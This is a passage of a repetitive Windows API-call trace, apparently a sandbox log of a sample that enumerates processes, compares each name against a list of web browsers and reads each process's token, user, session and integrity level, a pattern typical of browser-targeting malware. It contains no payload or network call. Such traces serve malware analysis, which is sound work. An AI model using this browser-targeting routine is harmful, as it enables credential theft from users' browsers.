(pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.421] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.422] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.422] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0241.422] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.422] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.422] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.422] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0241.422] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.422] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.422] GetLastError () returned 0x7a [0241.422] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.423] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.423] CloseHandle (hObject=0xb8) returned 1 [0241.423] CloseHandle (hObject=0xb4) returned 1 [0241.423] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.423] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.423] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.423] GetLastError () returned 0x7a [0241.423] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.424] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.424] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.424] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.424] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.424] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.424] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.424] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.424] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0241.424] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.424] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.424] GetLastError () returned 0x7a [0241.425] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.425] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.425] CloseHandle (hObject=0xb8) returned 1 [0241.425] CloseHandle (hObject=0xb4) returned 1 [0241.425] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.425] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.425] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.425] GetLastError () returned 0x7a [0241.426] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.426] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.426] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.426] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0241.426] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0241.426] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0241.426] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0241.426] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0241.426] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0241.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0241.426] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.427] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.427] GetLastError () returned 0x7a [0241.427] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.427] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.427] CloseHandle (hObject=0xb8) returned 1 [0241.427] CloseHandle (hObject=0xb4) returned 1 [0241.427] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.427] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.427] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.427] GetLastError () returned 0x7a [0241.427] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.428] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.428] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.428] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0241.428] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0241.428] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0241.428] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0241.428] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0241.428] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0241.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0241.428] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.428] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.428] GetLastError () returned 0x7a [0241.428] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.428] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.428] CloseHandle (hObject=0xb8) returned 1 [0241.429] CloseHandle (hObject=0xb4) returned 1 [0241.429] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.429] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.429] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.429] GetLastError () returned 0x7a [0241.429] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.429] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.429] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.429] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0241.429] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0241.429] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0241.429] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0241.429] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0241.429] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0241.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0241.430] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.430] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.430] GetLastError () returned 0x7a [0241.430] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.430] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.430] CloseHandle (hObject=0xb8) returned 1 [0241.430] CloseHandle (hObject=0xb4) returned 1 [0241.430] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.430] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.430] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.430] GetLastError () returned 0x7a [0241.431] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.431] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.431] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.431] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0241.431] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0241.431] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0241.431] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0241.431] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0241.431] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0241.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0241.431] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.431] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.431] GetLastError () returned 0x7a [0241.431] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.431] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.432] CloseHandle (hObject=0xb8) returned 1 [0241.432] CloseHandle (hObject=0xb4) returned 1 [0241.432] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.432] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.432] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.432] GetLastError () returned 0x7a [0241.432] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.432] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.432] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.432] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.432] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0241.432] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.432] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.432] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.432] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0241.433] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.433] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.433] GetLastError () returned 0x7a [0241.433] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.433] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.433] CloseHandle (hObject=0xb8) returned 1 [0241.433] CloseHandle (hObject=0xb4) returned 1 [0241.433] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.433] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.433] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.433] GetLastError () returned 0x7a [0241.433] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.433] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.433] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.434] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0241.434] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0241.434] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0241.434] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0241.434] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0241.434] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0241.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0241.434] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.434] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.434] GetLastError () returned 0x7a [0241.434] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.434] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.434] CloseHandle (hObject=0xb8) returned 1 [0241.434] CloseHandle (hObject=0xb4) returned 1 [0241.434] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.434] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.434] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.434] GetLastError () returned 0x7a [0241.435] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.435] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.435] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.435] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0241.435] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0241.435] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.435] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.435] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.435] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0241.435] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.435] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.435] GetLastError () returned 0x7a [0241.435] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.435] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.435] CloseHandle (hObject=0xb8) returned 1 [0241.435] CloseHandle (hObject=0xb4) returned 1 [0241.435] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.436] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.436] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.436] GetLastError () returned 0x7a [0241.436] GetTokenInformation (in: 